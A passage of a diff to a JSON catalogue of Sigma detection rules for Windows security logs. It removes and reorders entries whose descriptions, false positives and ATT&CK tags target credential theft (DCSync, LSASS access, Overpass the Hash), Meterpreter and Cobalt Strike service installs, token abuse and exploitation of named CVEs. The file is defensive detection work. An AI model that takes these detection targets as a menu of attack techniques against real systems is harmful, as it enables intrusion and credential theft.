- "type": "related-to"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "78d5cab4-557e-454f-9fb9-a222bd0d5edc",
- "value": "External Remote SMB Logon from Public IP"
- },
{
"description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME",
"meta": {
@@ -6769,8 +6483,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
"https://twitter.com/matthewdunwoody/status/1352356685982146562",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml"
],
"tags": [
@@ -6847,9 +6561,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616",
"Live environment caused by malware",
"Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml"
],
"tags": [
@@ -6910,56 +6624,6 @@
"uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed",
"value": "NetNTLM Downgrade Attack"
},
- {
- "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.",
- "meta": {
- "author": "NVISO",
- "creation_date": "2020/05/06",
- "falsepositive": [
- "Legitimate logon attempts over the internet",
- "IPv4-to-IPv6 mapped IPs"
- ],
- "filename": "win_security_susp_failed_logon_source.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.persistence",
- "attack.t1078",
- "attack.t1190",
- "attack.t1133"
- ]
- },
- "related": [
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1",
- "value": "Failed Logon From Public IP"
- },
{
"description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.",
"meta": {
@@ -6993,40 +6657,6 @@
"uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b",
"value": "VSSAudit Security Event Source Registration"
},
- {
- "description": "RDP login with localhost source address may be a tunnelled login",
- "meta": {
- "author": "Thomas Patzke",
- "creation_date": "2019/01/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_rdp_localhost_login.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "car.2013-07-002",
- "attack.t1021.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31",
- "value": "RDP Login from Localhost"
- },
{
"description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.",
"meta": {
@@ -7060,64 +6690,6 @@
"uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51",
"value": "Password Change on Directory Service Restore Mode (DSRM) Account"
},
- {
- "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.",
- "meta": {
- "author": "Robert Lee @quantum_cookie",
- "creation_date": "2023/03/16",
- "falsepositive": [
- "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM"
- ],
- "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.initial_access",
- "cve.2023.23397"
- ]
- },
- "uuid": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c",
- "value": "CVE-2023-23397 Exploitation Attempt"
- },
- {
- "description": "Detection of logins performed with WMI",
- "meta": {
- "author": "Thomas Patzke",
- "creation_date": "2019/12/04",
- "falsepositive": [
- "Monitoring tools",
- "Legitimate system administration"
- ],
- "filename": "win_security_susp_wmi_login.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ]
- },
- "related": [
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5af54681-df95-4c26-854f-2565e13cfab0",
- "value": "Login with WMI"
- },
{
"description": "Detects Obfuscated use of stdin to execute PowerShell",
"meta": {
@@ -7160,41 +6732,6 @@
"uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974",
"value": "Invoke-Obfuscation STDIN+ Launcher - Security"
},
- {
- "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)",
- "meta": {
- "author": "Michaela Adams, Zach Mathis",
- "creation_date": "2022/11/06",
- "falsepositive": [
- "Anti-Virus"
- ],
- "filename": "win_security_access_token_abuse.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
- "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1134.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f",
- "value": "Access Token Abuse"
- },
{
"description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.",
"meta": {
@@ -7240,8 +6777,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
"https://twitter.com/menasec1/status/1111556090137903104",
+ "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml"
],
"tags": [
@@ -7536,8 +7073,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649",
"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml"
],
"tags": "No established tags"
@@ -7559,9 +7096,9 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/SecurityJosh/status/1283027365770276866",
- "https://twitter.com/Flangvik/status/1283054508084473861",
"https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html",
"https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8",
+ "https://twitter.com/Flangvik/status/1283054508084473861",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml"
],
"tags": [
@@ -7874,9 +7411,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
"https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/",
"https://github.com/topotam/PetitPotam",
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml"
],
"tags": [
@@ -7909,8 +7446,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
"https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml"
],
"tags": [
@@ -8014,40 +7551,6 @@
"uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34",
"value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security"
},
- {
- "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like",
- "meta": {
- "author": "@SBousseaden, Florian Roth",
- "creation_date": "2019/11/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_susp_rottenpotato.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1195284233729777665",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.credential_access",
- "attack.t1557.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f",
- "value": "RottenPotato Like Attack Pattern"
- },
{
"description": "Detects service ticket requests using RC4 encryption type",
"meta": {
@@ -8062,8 +7565,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://adsecurity.org/?p=3458",
"https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity",
+ "https://adsecurity.org/?p=3458",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml"
],
"tags": [
@@ -8083,41 +7586,6 @@
"uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39",
"value": "Suspicious Kerberos RC4 Ticket Encryption"
},
- {
- "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "creation_date": "2020/09/02",
- "falsepositive": [
- "SCCM"
- ],
- "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.privilege_escalation",
- "attack.persistence",
- "attack.t1546.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648",
- "value": "Remote WMI ActiveScriptEventConsumers"
- },
{
"description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender",
"meta": {
@@ -8238,9 +7706,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743",
- "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml"
],
"tags": "No established tags"
@@ -8388,41 +7856,6 @@
"uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302",
"value": "PowerShell Scripts Installed as Services - Security"
},
- {
- "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)",
- "creation_date": "2019/06/02",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_security_rdp_bluekeep_poc_scanner.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/zerosum0x0/CVE-2019-0708",
- "https://twitter.com/AdamTheAnalyst/status/1134394070045003776",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1210",
- "car.2013-07-002"
- ]
- },
- "related": [
- {
- "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8400629e-79a9-4737-b387-5db940ab2367",
- "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln"
- },
{
"description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n",
"meta": {
@@ -8577,9 +8010,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://threathunterplaybook.com/library/windows/active_directory_replication.html",
"https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html",
- "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml"
],
"tags": [
@@ -8633,10 +8066,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml"
],
"tags": "No established tags"
@@ -8657,16 +8090,16 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
"https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
"https://bunnyinside.com/?term=f71e8cb9c76a",
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml"
],
"tags": [
@@ -8870,8 +8303,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml",
+ "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml"
],
"tags": [
@@ -8891,57 +8324,6 @@
"uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8",
"value": "Azure AD Health Service Agents Registry Keys Access"
},
- {
- "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.",
- "meta": {
- "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
- "creation_date": "2023/01/19",
- "falsepositive": [
- "Legitimate or intentional inbound connections from public IP addresses on the RDP port."
- ],
- "filename": "win_security_successful_external_remote_rdp_login.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
- "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_successful_external_remote_rdp_login.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.credential_access",
- "attack.t1133",
- "attack.t1078",
- "attack.t1110"
- ]
- },
- "related": [
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2",
- "value": "External Remote RDP Logon from Public IP"
- },
{
"description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN",
"meta": {
@@ -8988,8 +8370,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml"
],
"tags": [
@@ -9022,8 +8404,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://adsecurity.org/?p=2053",
"https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/",
+ "https://adsecurity.org/?p=2053",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml"
],
"tags": [
@@ -9151,8 +8533,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml",
+ "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml"
],
"tags": [
@@ -9185,8 +8567,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/duzvik/status/1269671601852813320",
"https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072",
+ "https://twitter.com/duzvik/status/1269671601852813320",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml"
],
"tags": [
@@ -9219,8 +8601,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml",
"https://github.com/topotam/PetitPotam",
+ "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml"
],
"tags": [
@@ -9286,9 +8668,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
"https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
"https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all",
- "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml"
],
"tags": [
@@ -9321,9 +8703,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://adsecurity.org/?p=3466",
"https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/",
"https://msdn.microsoft.com/en-us/library/cc220234.aspx",
- "https://adsecurity.org/?p=3466",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml"
],
"tags": [
@@ -9343,40 +8725,6 @@
"uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc",
"value": "Active Directory User Backdoors"
},
- {
- "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.",
- "meta": {
- "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)",
- "creation_date": "2018/02/12",
- "falsepositive": [
- "Runas command-line tool using /netonly parameter"
- ],
- "filename": "win_security_overpass_the_hash.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.s0002",
- "attack.t1550.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87",
- "value": "Successful Overpass the Hash Attempt"
- },
{
"description": "Detects possible addition of shadow credentials to an active directory object.",
"meta": {
@@ -9425,8 +8773,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml"
],
"tags": [
@@ -9461,8 +8809,8 @@
"logsource.product": "windows",
"refs": [
"https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://www.sans.org/webcasts/119395",
"https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.sans.org/webcasts/119395",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml"
],
"tags": [
@@ -9500,27 +8848,6 @@
"uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6",
"value": "CobaltStrike Service Installations - Security"
},
- {
- "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466",
- "value": "Suspicious Computer Account Name Change CVE-2021-42287"
- },
{
"description": "Addition of domains is seldom and should be verified for legitimacy.",
"meta": {
@@ -9567,10 +8894,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
"https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
"https://twitter.com/gentilkiwi/status/1003236624925413376",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
- "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml"
],
"tags": [
@@ -9708,8 +9035,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/malmoeb/status/1511760068743766026",
"https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py",
+ "https://twitter.com/malmoeb/status/1511760068743766026",
"https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml"
],
@@ -9768,152 +9095,6 @@
"uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4",
"value": "Suspicious Scheduled Task Update"
},
- {
- "description": "Detect remote login by Administrator user (depending on internal pattern).",
- "meta": {
- "author": "juju4",
- "creation_date": "2017/10/29",
- "falsepositive": [
- "Legitimate administrative activity."
- ],
- "filename": "win_security_admin_rdp_login.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://car.mitre.org/wiki/CAR-2016-04-005",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1078.001",
- "attack.t1078.002",
- "attack.t1078.003",
- "car.2016-04-005"
- ]
- },
- "related": [
- {
- "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d",
